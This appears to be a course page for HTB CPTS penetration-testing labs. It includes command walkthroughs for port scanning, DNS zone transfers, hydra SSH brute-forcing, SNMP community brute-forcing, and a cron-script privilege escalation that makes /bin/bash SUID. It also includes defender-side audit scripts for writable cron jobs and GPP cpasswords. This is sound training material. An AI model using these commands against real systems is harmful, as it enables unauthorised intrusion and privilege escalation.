HTB Certified Penetration Testing Specialist
Seven modules covering the full HTB CPTS curriculum — infrastructure footprinting, common service attacks, web exploitation, database attacks, directory services, and a complete Active Directory engagement chain.
CPTS vs OSCP — What's Different
Both are hands-on hacking certs, but they test different depth and breadth.
Deeper Enumeration Focus
CPTS places heavier emphasis on systematic footprinting — every service gets its own enumeration methodology before exploitation is attempted. The HTB curriculum dedicates entire modules to protocols like LDAP, SNMP, SMTP, and MSSQL that OSCP treats as background knowledge.
Active Directory Depth
CPTS expects you to know BloodHound attack paths, ACL abuse (GenericWrite, WriteDACL, GenericAll), Kerberoasting, AS-REP roasting, and DCSync cold. The AD section of the exam is significantly more complex than the OSCP AD set.
bloodhound-python -u user -p pass -d domain.local -ns DC_IP -c all
# Then: Find Shortest Paths to Domain Admins in BloodHound UI
No Buffer Overflow
CPTS does not include a standalone BOF machine. Instead it emphasises web application attacks, API security, and lateral movement depth. If you are studying for CPTS only, you can skip the BOF module on the OSCP path — but it's still excellent practice.
Report-Writing is Graded
CPTS is a professional certification exam that includes a report writing component. Practice documenting every finding as you work through these labs: service version, vulnerability, exploitation steps, and impact. Your report is part of your exam grade.
# Report sections per finding:
- Service & Version
- Vulnerability / Misconfiguration
- Proof (screenshot + flag)
- Remediation recommendation
The Seven Modules
Module 1 is free. Modules 2–7 can be unlocked one at a time with a 24-hour timer, or instantly with Premium.
Reconnaissance & Footprinting
CPTS emphasises a structured enumeration methodology before any exploitation attempt. These labs cover infrastructure-level recon: DNS zone mapping and SNMP device enumeration — two techniques that produce actionable data on every enterprise engagement.
HTB CPTS — Footprinting module
- DNS zone transfer and subdomain brute-forcing (dig, dnsenum, fierce)
- SNMP community string discovery and OID tree walking (onesixtyone, snmpwalk)
- nmap service/version fingerprinting with default script sets
- Building an accurate attack-surface inventory before touching exploits
Attack Pattern DNS — Zone Transfer + Cron PrivEsc
CPTS angle: CPTS expects you to document every record returned by the zone transfer and map it to potential attack vectors before touching an exploit.
1 — Full port scan
nmap -sC -sV -p- -T4 TARGET
nmap -sU --top-ports 50 TARGET
2 — DNS Zone Transfer
dig SOA @TARGET lab.local
dig AXFR lab.local @TARGET
dnsenum --dnsserver TARGET --enum lab.local
3 — Credential brute-force / reuse
hydra -l labuser -P /usr/share/wordlists/rockyou.txt ssh://TARGET -t 4
4 — Privilege Escalation via writable cron script
cat /etc/crontab && ls /etc/cron*
find / -writable -name "*.sh" 2>/dev/null
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# wait for cron to run, then:
/bin/bash -p
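The misconfiguration step 4 relies on is a root cron job whose script a non-root user can edit. As an added defender-side check (not part of the lab or this page's commands), the script below parses /etc/crontab-style entries and reports such scripts; the crontab text and the SAMPLE_MODES permission table are constructed stand-ins, and on a real host the lookup argument would wrap os.stat.

```python
import re
import stat
from typing import Callable, Dict, List, Tuple

# Constructed sample /etc/crontab (not from the lab): the root job at */5 runs a
# script a normal user can modify, the misconfiguration step 4 above relies on.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *  * * *  root  cd / && run-parts --report /etc/cron.hourly
*/5 * * * *  root  /opt/backup.sh
0 3   * * *  root  /usr/local/bin/rotate-logs.sh > /dev/null 2>&1
"""

SAMPLE_MODES: Dict[str, Tuple[int, int]] = {  # constructed stand-in for os.stat(): path -> (st_mode, st_uid)
    "/opt/backup.sh": (0o100777, 1000),              # world-writable, owned by uid 1000
    "/usr/local/bin/rotate-logs.sh": (0o100755, 0),  # root-owned, owner-writable only
}

CRON_LINE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def parse_system_crontab(text: str) -> List[Tuple[str, str]]:
    """Return (user, command) pairs, skipping blank lines, comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
            continue
        if m := CRON_LINE.match(line):
            jobs.append((m.group("user"), m.group("cmd").strip()))
    return jobs

def writable_by_non_owner(mode: int, uid: int, job_uid: int = 0) -> bool:
    """True if the file is group/world-writable or owned by someone other than the job's user."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) or uid != job_uid

def audit_crontab(text: str, lookup: Callable[[str], Tuple[int, int]]) -> List[str]:
    """Paths referenced by root jobs that a non-root user could modify; lookup(path) -> (st_mode, st_uid)."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        for tok in cmd.split():
            if user != "root" or not tok.startswith("/") or tok == "/":
                continue
            try:
                mode, uid = lookup(tok)
            except (KeyError, OSError):  # not in the table / not on disk
                continue
            if writable_by_non_owner(mode, uid) and tok not in findings:
                findings.append(tok)
    return findings
```

Run against the sample it reports only /opt/backup.sh; the same check over /etc/cron.d entries is a one-line loop over those files.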
Attack Pattern SNMP — Community Brute-Force + SUID PrivEsc
CPTS angle: SNMP often exposes running processes, open ports, and usernames that DNS and nmap miss. Always scan UDP 161 early.
1 — SNMP Community Discovery
nmap -sU -p 161 --script snmp-brute TARGET
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt TARGET
2 — OID Enumeration
# Running processes
snmpwalk -v2c -c COMMUNITY TARGET 1.3.6.1.2.1.25.4.2.1.2
# Listening ports
snmpwalk -v2c -c COMMUNITY TARGET 1.3.6.1.2.1.6.13.1.3
# User accounts
snmpwalk -v2c -c COMMUNITY TARGET 1.3.6.1.4.1.77.1.2.25
3 — SUID Escalation
find / -perm -4000 -type f 2>/dev/null
# Cross-reference with https://gtfobins.github.io/
Attacking Common Services — Network Protocols
The HTB CPTS Attacking Common Services module covers every legacy protocol you will encounter in enterprise environments. Telnet, TFTP, and SMTP represent three distinct attack surfaces: credential brute-force, anonymous file retrieval, and user enumeration.
Unlock this module free after a 24-hour wait, or get instant access with Premium. Only 1 free unlock at a time.
Attacking Common Services — File Shares
Rsync, SMB, and FTP are the three most common misconfigured file-share services in real environments. The CPTS curriculum drills anonymous access, null session enumeration, and credential extraction from synced files — all essential for the CPTS exam's 'Attacking Common Services' section.
Web Application Attacks — Command Injection
Command injection is one of the highest-impact web vulnerabilities in the CPTS exam. This lab isolates the full exploitation chain: directory enumeration → vulnerable parameter discovery → OS command injection → reverse shell → privilege escalation. Exactly the methodology taught in the CPTS Command Injections module.
Attacking Common Services — Databases
MySQL and Redis are two of the most frequently misconfigured database services in real engagements. CPTS teaches extraction, lateral movement via credential reuse, and code-execution paths through service trust abuse. These two labs cover both the relational and key-value attack surfaces.
Directory Services & Credential Harvesting
LDAP anonymous binds expose the full internal user directory on misconfigured enterprise deployments. The CPTS footprinting module covers LDAP enumeration as a prerequisite for Active Directory attacks — extracting usernames, group memberships, and service account attributes that feed downstream attacks.
Active Directory Enumeration & Attacks
Active Directory attacks are the centrepiece of the CPTS exam and the most common path to Domain Admin in real engagements. The CorpNet pair simulates a real Windows domain: domain controller plus workstation. Enumerate, escalate, move laterally, and own the domain.
Active Directory — Advanced Attacks
The MegaCorp domain controller has a Group Policy Preferences update sitting in SYSVOL — a Groups.xml file with a service account password encrypted using the publicly known GPP AES key (MS14-025). Start from an exposed web config on the workstation, harvest SYSVOL credentials, and achieve full domain compromise via a classic GPP/SYSVOL attack chain.
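The artefact the GPP/SYSVOL chain above depends on is a Preferences XML file that still carries a cpassword attribute. As an added defender-side check (not part of the lab or this page), the script below walks a SYSVOL copy, finds the GPP files that can store one, and reports each account so the entry can be removed; the Groups.xml sample and its cpassword value are constructed placeholders, not a real blob.

```python
import os
import xml.etree.ElementTree as ET
from typing import List, Tuple

# GPP XML files that can carry a cpassword attribute under SYSVOL\<domain>\Policies\...\Preferences\
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Printers.xml", "Drives.xml"}

# Constructed sample Groups.xml (not from the lab); the cpassword value is a placeholder, not a real blob.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_backup" changed="2024-01-01 00:00:00">
    <Properties action="U" userName="svc_backup" cpassword="PLACEHOLDER_CPASSWORD_VALUE" neverExpires="1"/>
  </User>
  <User name="helpdesk" changed="2024-01-01 00:00:00">
    <Properties action="U" userName="helpdesk" cpassword=""/>
  </User>
</Groups>
"""

def find_cpassword_entries(xml_text: str) -> List[Tuple[str, str]]:
    """Return (account, cpassword) for every Properties element with a non-empty cpassword attribute."""
    hits = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword", "")
        if cp:
            # Groups.xml names the account in userName; Services/ScheduledTasks use accountName or runAs
            account = props.get("userName") or props.get("accountName") or props.get("runAs") or "?"
            hits.append((account, cp))
    return hits

def scan_sysvol(root_dir: str) -> List[Tuple[str, str, str]]:
    """Walk a SYSVOL copy and return (file_path, account, cpassword) for each stored GPP credential."""
    results = []
    for dirpath, _, filenames in os.walk(root_dir):
        for name in filenames:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8-sig") as fh:  # GPP files are usually written with a BOM
                    for account, cp in find_cpassword_entries(fh.read()):
                        results.append((path, account, cp))
            except (OSError, ET.ParseError):
                continue
    return results
```

Any hit is a finding on its own: the password should be rotated and the preference item deleted, since the stored value is recoverable with the published key the text refers to.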